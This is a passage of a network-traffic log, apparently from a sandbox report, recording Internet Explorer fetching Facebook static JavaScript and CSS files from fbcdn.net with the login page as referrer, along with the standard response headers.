permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: NScDESqbCowvTfZrxIUfFA==
X-FB-Debug: y2WLaDnIf5j014ys5bmjKVKFR6lGk1CocT1VH/qnHSK3jPQ/lEwVwK5INm67dYIlWp0HTqwHgPiFDaq8yp2JiA==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 9158
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yk/r/kg_LcWkMBGy.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 27 Sep 2024 17:31:41 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: g2SM6Uf8LlK9MUKxGrvQPQ==
X-FB-Debug: /DCrbBKQifl84p0ozTR8hitghClgMPQQopzAmayD+AvSlIp246p7FjM8ltzX4IcpcHznL84CGCGkrO/x55IJ/Q==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 1210
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yb/r/TPdUEkA5C5u.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 18:03:22 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: bFQKJfx05EZ4r58QzbO35g==
X-FB-Debug: DpEW3BA02vDBo7dRamZGaS73Q5Rr1yXNvC4tS0elihmBNnzkIX5vOwQLo4OrzWgbT5IaamlpKZDzIDWH0ZFy8w==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 8844
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/ym/r/R_qswDMOLWA.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 28 Sep 2024 18:02:09 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: WMPydK4jXRSfSJB/gNuJHg==
X-FB-Debug: 5ogz4oa097EogyuPl+eKIH2BbaDrikWOR+enDfZZLtcY8DWbtKzaOcL8Z1jXN2HdEwbvFiiaKzJxPtHe5ulliw==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 3947
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yS/r/8Y1pHPyESqG.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 18:03:22 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: hidUvhZNPQX6rwPbaP9+zQ==
X-FB-Debug: aK1WBAfoHg2a9aMP4xbkeAooAO2jaw4k082WoTuQQ6fYjS1CHBRJOB6sg+nQKQXEa/qMbArCwa4ZGaOjnxzJIA==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 58389
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/srbvjPu5q9v.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/yX/l/0,cross/srbvjPu5q9v.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Thu, 03 Oct 2024 19:20:08 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: /HWblO/2890yRe+9OFOSlQ==
X-FB-Debug: PNCIOM2G7bqyAU2UAQ7NQDGmsXvGqyFppMb5Ku9uE5XZP8do/FtOfUH84Lp2L4K7pHX4V2GDYy3PC7cPlR7tXA==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 1308
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/yu/l/0,cross/wMWvCV-I6Hn.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/yu/l/0,cross/wMWvCV-I6Hn.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 19:24:30 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: KVGzbyUBBR6l76u8viaU/Q==
X-FB-Debug: ZcHxhlrscq9cDht9G/fMdz9dQL13qDFmdT8HegzBKBNYwPJ2Eaa1VQQLfn7EYCN8MdxgstwYpGiI9ZqmJaon/Q==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 3031
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yA/r/gYsh5OsZKde.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Wed, 02 Oct 2024 06:06:16 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: v5PTR0r6A0MnlSpEe+3ShQ==
X-FB-Debug: LUVvFEIFyAYDqDzZArv2Ji4WIewriDji1emhs7e6C81SZNv94ghXVnXvkabABnJZ+i+reuCpSCu+c9DK7kvIeg==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 3555
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/ye/r/yUtEQ4ajXZI.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Thu, 03 Oct 2024 18:51:11 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: WCUQJeRI9cPYgTinbDNMyA==
X-FB-Debug: xFTcjTf1P5qxY/iPb4KQ4cviNXQdZpdSSsbclKDF8YFZmtaEqxJhGoUGXrFW3Z2a29YMiw6U2/zwfsI85NIxZQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 845
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yF/r/gb_2sOlx922.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 18:02:46 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: iiumhTuchGiaOohZ1sX5ng==
X-FB-Debug: ycegUAZWU+dly7mWzTrBWScR5l4mpVj6oh3QO4sMCEcC0SgfhCvP4kvFlsgunC0NLaOdp9XiW2s96hg29fNl7g==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 2515
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yJ/r/_i_bZ2JArcF.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 18:03:22 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: FtGA3BRVZDRoGV+sbC9TXw==
X-FB-Debug: MO2L3IdJLVLZSqTTG2GAAx14NPTdsw1nxXzTeW2oI1nSSmyQNYVv1gI3ucKW3Hlm3T0VEuJxrIvh65kYf7+c5A==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 2334
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yo/r/j5B70NmINXl.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Wed, 02 Oct 2024 06:06:16 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: QyIcWgTISJVkmoiPiRh4xA==
X-FB-Debug: SI4uo6MiGNKCueFlgjpB4nZdb2J+Q51y1SY0O6FIsNKjsMtEjZXniCZZs1WmBzF7W9JSF8+9J8S2KNV1314N1w==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 8495
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3iqES4/yQ/l/en_US/riV0sq4fGtL.js?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3iqES4/yQ/l/en_US/riV0sq4fGtL.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 23:49:16 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
x-fb-optimizer: 0
content-md5: 0UAQvXlRsQvG/APu1nqltw==
X-FB-Debug: A/0CoARQAZB0GSMaoMkmmh0zIPdeSW89tl8JX+S1QAJJ+BTRZ8gDK38H40IRpp36xuAU7UW1dQ1sJZ3s+HSA/w==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 14979
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 05 Oct 2024 17:41:07 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: 5HHrVWw8oRgkBBacKgsdCw==
X-FB-Debug: jgZnKOtgTKqkCWekRWL6i8dTOyyefoxH97T8+ZeD+4VRr7alYjqbUQ2pEVuF2+ZcRiqNX+Q0WcfMoIGaIaagzw==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 1557
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/WmItEcPXNHF.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/yS/l/0,cross/WmItEcPXNHF.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 27 Sep 2024 19:43:15 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: IB0ZaqJVOMhgulk+zkLm2A==
X-FB-Debug: 9/YogmtKkkmDr3z3rpzOmzIcc0yn4ciZnJ/lDjU2TqR08j3Tw43gcPDjBHGSIYru6+7bTr1T1ZsmHXzIxovVig==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 3820
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/ys/r/_f5wO_K1viW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Wed, 02 Oct 2024 23:05:45 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
x-fb-optimizer: 0
content-md5: BPz/OR+hBJJ7/8t+ll6G3Q==
X-FB-Debug: V5lt+TwAKiVIaW2QQvUiEW82mC52uOekgmIzbkqFxOzz5/3ydIBKdX6PtjFRBfIKH43WbpBiUn9hdbQAcdJY6A==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 6858
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 17:30:15 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: /KN4BNtqrVgo5QvJPmYKrg==
X-FB-Debug: CZgQZDybPZMG6SNLIxqbFTQS9SMnxMjz0/TMT1R/6+3NWoCnK3NDNOI1ZoGHbgfg6ETklUjwMBXHjjLUdVMRuw==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 2227
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 27 Sep 2024 02:07:22 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: PCil07El4hl7RdWxcVlVHw==
X-FB-Debug: 6mCb5ksE4SWY6ep/dBvt3HDcZMThH0nxucS18D9SjyazJJieB0fRt/z9fHQFj84BwZyluLHa/UAIsSNtM7RAfA==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 333
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yb/r/X98p6omdveu.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 28 Sep 2024 18:35:02 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: pMcL/f4B6KDe08MYVaiwtQ==
X-FB-Debug: g3FxdKgl+EIqLZIl9Vlz4oU11SZ96mI+DWcojALRHipSeM+iAcWJdkyVScqINpGpVcEtc5z5yuGnekvRShuQ0Q==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 13203
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/y2/r/Szq51TCr-iX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 27 Sep 2024 17:31:41 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: t2HbM6EoMk3FCrni3vrO0g==
X-FB-Debug: QOyy6wBVEKZBi9eazIEkGfO6z5S7SHf6i8zs8uA0Gt+3AQKzV9FiNmyXtl7agutG9AfdcRoYAC6WsSaNFtKadA==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 2833
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yn/r/FQIPxzEyFvX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 05 Oct 2024 20:54:26 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
